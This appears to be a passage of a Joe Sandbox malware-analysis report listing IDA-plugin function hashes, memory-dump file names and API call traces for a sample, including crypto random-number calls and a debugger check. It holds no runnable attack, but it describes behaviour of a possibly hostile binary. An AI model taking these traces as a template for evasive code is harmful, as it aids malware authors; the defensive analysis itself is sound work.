                                            • Opcode ID: e7ef5b2ee0c861889489c57a0b11a19645727a9ae1910ebeb2e0fd6d8d388ce4
                                            • Instruction ID: 9ee392ca3a7d024640c72973402f3d8ba27f41720e66c3e307067265ebcfc30e
                                            • Opcode Fuzzy Hash: e7ef5b2ee0c861889489c57a0b11a19645727a9ae1910ebeb2e0fd6d8d388ce4
                                            • Instruction Fuzzy Hash: 00D05EB090620CDFC700EFA8A9486AD7BF8E709301F4045A8A908C3211DB355E10EA61
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf774a03742dc1b66811d68e4058a5a7987433915e71a8008f57382c1567f33
                                            • Instruction ID: 36eab4c6c3e990746876922ea078383d3ee884b2244b6c4f9119338c22a4a482
                                            • Opcode Fuzzy Hash: 0cf774a03742dc1b66811d68e4058a5a7987433915e71a8008f57382c1567f33
                                            • Instruction Fuzzy Hash: 49D0222100C29C4DC30127F838483F83B7AAB3AB02FC80B04E44801872EF36200CEA11
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e1e579f197cdefbc65e8389fd5c17ecd83e62be600ca07fe7ea003879b74123
                                            • Instruction ID: f222d444c9b648f64c1e2ef7d14c5eef30c755116a1558397c3ac0c58cabe2cb
                                            • Opcode Fuzzy Hash: 0e1e579f197cdefbc65e8389fd5c17ecd83e62be600ca07fe7ea003879b74123
                                            • Instruction Fuzzy Hash: 10D0223004C24C4EEB1607F868863E93F389306302F080B48EC8D800E3C790001AEE82
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0740a4a755bbb6e86cc0521222c08435f64711ecab974b36aabcbcf50d37d11
                                            • Instruction ID: ba9c50398df2a5646281c78683b552d97aa4569ae3846b28e3fbdc428ffabdd8
                                            • Opcode Fuzzy Hash: f0740a4a755bbb6e86cc0521222c08435f64711ecab974b36aabcbcf50d37d11
                                            • Instruction Fuzzy Hash: 6AD0123020530C9FDF109BB5DD4C71A7F99AB05666F00D835F849C2250DF36D455DB60
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 912adfe54c0e23c1b48e15f51af52e4537c972b6c1e33265b0e5548df6f8a6d3
                                            • Instruction ID: fb7b4b6510bb08032171d103fcf5209fe597c06f775dbdf768a8bd1878f118d0
                                            • Opcode Fuzzy Hash: 912adfe54c0e23c1b48e15f51af52e4537c972b6c1e33265b0e5548df6f8a6d3
                                            • Instruction Fuzzy Hash: 4ED0C76040839D89D71193A97D883613ED46302719F4C1255F444407A3C7A9509CFE61
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f67915e6f6245cbf76ff95475983add6be73f7488e00b1fb2932a06d2ec2bbcb
                                            • Instruction ID: dbdc5e14f5db5c14478ebc33d41d7583154311c60c433f8f8588337d7c097f46
                                            • Opcode Fuzzy Hash: f67915e6f6245cbf76ff95475983add6be73f7488e00b1fb2932a06d2ec2bbcb
                                            • Instruction Fuzzy Hash: 0CC08C3004921C8EC10423EC79483B872AE2729306FC00200A00D008629F615018E962
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1d7cd754360478c5a41ad9040310a5c67c05b41b3207f363c3cf6b4bd4769ea
                                            • Instruction ID: 10207455f8f76b052cef705b90a377e93c90fa66353b168eb6112a9f40a2ab56
                                            • Opcode Fuzzy Hash: d1d7cd754360478c5a41ad9040310a5c67c05b41b3207f363c3cf6b4bd4769ea
                                            • Instruction Fuzzy Hash: D7C09B3004961C8EC9151B9CB9487B57ABC5715317F891614A50D814B3CF656464FDD5
                                            APIs
                                            • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,689D0634,689D0738,?), ref: 6895A119
                                            • GetModuleHandleW.KERNEL32(mscorwks), ref: 6895A145
                                            • __cftoe.LIBCMT ref: 6895A1FB
                                            • GetModuleHandleW.KERNEL32(?), ref: 6895A215
                                            • GetProcAddress.KERNEL32(00000000,00000018), ref: 6895A265
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                            • String ID: mscorwks$v2.0.50727$wks
                                            • API String ID: 1312202379-2066655427
                                            • Opcode ID: ff39d78d3dca99b1940dbaecfa514eb7bed09826185951b148b1d9614e68f748
                                            • Instruction ID: 81da0d0d8f2703cbc775e664d24b73216827a251e29edda91cd409e461aaaaf9
                                            • Opcode Fuzzy Hash: ff39d78d3dca99b1940dbaecfa514eb7bed09826185951b148b1d9614e68f748
                                            • Instruction Fuzzy Hash: 72916B70E042499FCB04CFE8D8849AEBBF5BF49314F90826DE529EB240D734D945CBA9
                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,513F6A41,689C8180,00000000,?), ref: 6899DBFB
                                            • GetLastError.KERNEL32 ref: 6899DC01
                                            • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6899DC15
                                            • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6899DC26
                                            • SetLastError.KERNEL32(00000000), ref: 6899DC2D
                                              • Part of subcall function 6899D9D0: GetLastError.KERNEL32(00000010,513F6A41,7508FC30,?,00000000), ref: 6899DA1A
                                            • __CxxThrowException@8.LIBCMT ref: 6899DC78
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                            • String ID: CryptAcquireContext$Crypto++ RNG
                                            • API String ID: 3279666080-1159690233
                                            • Opcode ID: 750e3824212ef23ec3601585641a91354d6fb915f0783c6ca5c9e3c5a94d5f3f
                                            • Instruction ID: b2ee57b80ad3c4a01584e696c49e757c552ccf8abfbf83997cb24e0034a924a4
                                            • Opcode Fuzzy Hash: 750e3824212ef23ec3601585641a91354d6fb915f0783c6ca5c9e3c5a94d5f3f
                                            • Instruction Fuzzy Hash: CE21847129C340AFE720DF64CC45F6F7BE8AB99794F84091DF541A62C0EBB6E4048B56
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 689ACE6C
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 689ACE81
                                            • UnhandledExceptionFilter.KERNEL32(689C9428), ref: 689ACE8C
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 689ACEA8
                                            • TerminateProcess.KERNEL32(00000000), ref: 689ACEAF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 1e6bdf5ad61709161f8d3ec5a16b79810282037bf02c9e390c86a3b5c63f7c90
                                            • Instruction ID: 7a77194b68031a0dc39dfea28fad0f2d93a0d9434f807bcbeddbbf3a20c9750b
                                            • Opcode Fuzzy Hash: 1e6bdf5ad61709161f8d3ec5a16b79810282037bf02c9e390c86a3b5c63f7c90
                                            • Instruction Fuzzy Hash: DA2199B5909304DFCF61DF68D58864D3FF4BF0A309F50405AE50AA7A90E7B199808F5A
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42804cacdc01b8a678c5ddf8633becdb6796a5403bcf93b13fe510c154af34f2
                                            • Instruction ID: 3d4ef90983fd91adbbb29cb5f77d90ed48b178f870d3e383951ab2c5c4651360
                                            • Opcode Fuzzy Hash: 42804cacdc01b8a678c5ddf8633becdb6796a5403bcf93b13fe510c154af34f2
                                            • Instruction Fuzzy Hash: 78026A704183948FC744CF69D8A453EBBF1EFCA212F41091EE6FA672A6D234B558CB61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: a56b3235f6f4d1abffaecd1ec8a24a5e75f59245f2f28c02092cbdec27c6ec90
                                            • Instruction ID: 7f51df700778ff8b45cba5bc3201ee4794165ef05bd694197b41b39ab50be206
                                            • Opcode Fuzzy Hash: a56b3235f6f4d1abffaecd1ec8a24a5e75f59245f2f28c02092cbdec27c6ec90
                                            • Instruction Fuzzy Hash: 05E16B7041C3958EC744CB69D8A453E7FF1EBCA222F41051EE6F6772AAD234B169CB21
                                            APIs
                                            • CryptGenRandom.ADVAPI32(?,?,?,513F6A41,00000000), ref: 6899DE6F
                                            • __CxxThrowException@8.LIBCMT ref: 6899DEB9
                                              • Part of subcall function 6899DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,689BF0E6,000000FF,6899DF67,00000000,?), ref: 6899DDB4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Crypt$ContextException@8RandomReleaseThrow
                                            • String ID: CryptGenRandom
                                            • API String ID: 1047471967-3616286655
                                            • Opcode ID: 90e54d56a01a4ee6f1664ea0d024f168e10530a56e681fdc2420aecd9da09b3f
                                            • Instruction ID: a8e9c42c15f19f688d8d47cc32d24576c799e403c1f0e1b2ff70032e4b5d0ad7
                                            • Opcode Fuzzy Hash: 90e54d56a01a4ee6f1664ea0d024f168e10530a56e681fdc2420aecd9da09b3f
                                            • Instruction Fuzzy Hash: 6621387551C3409FD714DF24C448B5ABBF8BB99718F804A0DF46593780EB75E504CB92
                                            APIs
                                            • GetLastError.KERNEL32(00000010,513F6A41,7508FC30,?,00000000), ref: 6899DA1A
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ErrorLastXinvalid_argumentstd::_
                                            • String ID: operation failed with error $OS_Rng:
                                            • API String ID: 406877150-700108173
                                            • Opcode ID: eeb35a29c4d8ed74d61d7bd4d8c76b86b03bd9ff3284c0de0ffd27344f2f6839
                                            • Instruction ID: a915da7006801712a2f5d851cbf74a0573cddacd9ff46fccdb0b63edd4d6d6f3
                                            • Opcode Fuzzy Hash: eeb35a29c4d8ed74d61d7bd4d8c76b86b03bd9ff3284c0de0ffd27344f2f6839
                                            • Instruction Fuzzy Hash: 73418CB59083809FD720CF69C841B6BBBE8BFE9744F94492EE19987241DB76D404CB63
                                            APIs
                                              • Part of subcall function 68944760: __CxxThrowException@8.LIBCMT ref: 689447F9
                                            • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6899DF7B
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextCryptException@8ReleaseThrow
                                            • String ID:
                                            • API String ID: 3140249258-0
                                            • Opcode ID: c0e15a547f8bfe6cebbe872b53acccccdbf05ee09962b34036f8dae594ebac59
                                            • Instruction ID: f4372482c0f5ad25d1524e754db94d955bb6f2247c49190f278bcee1d6535211
                                            • Opcode Fuzzy Hash: c0e15a547f8bfe6cebbe872b53acccccdbf05ee09962b34036f8dae594ebac59
                                            • Instruction Fuzzy Hash: A821A1B5508340AFC600DF14C940B5BBBE8EBAA768F840A2DF84593381D771E508CBA3
                                            APIs
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,689BF0E6,000000FF,6899DF67,00000000,?), ref: 6899DDB4
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextCryptRelease
                                            • String ID:
                                            • API String ID: 829835001-0
                                            • Opcode ID: 56f59dbff6c0d810773121dd8e3595321890799d154543b1f75fe533bd651b27
                                            • Instruction ID: 1beef33a250824b4bf84c398606aff186dbeffcf89aebe1915da263fa981b520
                                            • Opcode Fuzzy Hash: 56f59dbff6c0d810773121dd8e3595321890799d154543b1f75fe533bd651b27
                                            • Instruction Fuzzy Hash: E811B9B56087509FEB10CF58C8C575A77ECFB45754F880529E925D3B80E77AD4048791
                                            APIs
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 689C35F5
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextCryptRelease
                                            • String ID:
                                            • API String ID: 829835001-0
                                            • Opcode ID: a1b87d9b2704b17ed1811ff514a01ddaacf61d226f5d18f440bdd80ffcf3c60e
                                            • Instruction ID: c5534ada95dce35149422a76c9aa285e982d85903689d3efbfc44ef2132cbf26
                                            • Opcode Fuzzy Hash: a1b87d9b2704b17ed1811ff514a01ddaacf61d226f5d18f440bdd80ffcf3c60e
                                            • Instruction Fuzzy Hash: 1AD0A7B160531157FF20CA74DD09B4A36EC5F06244F490010F514D7280DF61D400CB66
                                            APIs
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6899D803
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextCryptRelease
                                            • String ID:
                                            • API String ID: 829835001-0
                                            • Opcode ID: bdfd9c786a3b5c99eb4f35f09ac57fc109125b4b94a812474415b991f20881e2
                                            • Instruction ID: d4d8d3bc83761349a5790391bb5cbacdc2d3bd8b6602694c7f4cacef333890dc
                                            • Opcode Fuzzy Hash: bdfd9c786a3b5c99eb4f35f09ac57fc109125b4b94a812474415b991f20881e2
                                            • Instruction Fuzzy Hash: EED05EB574431017DB20DE189C45B8776CC5F11A48F5A4829F56AD2281D6B1D48087D6
                                            APIs
                                            • CryptReleaseContext.ADVAPI32(?,00000000,8504498B), ref: 6899D7E0
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
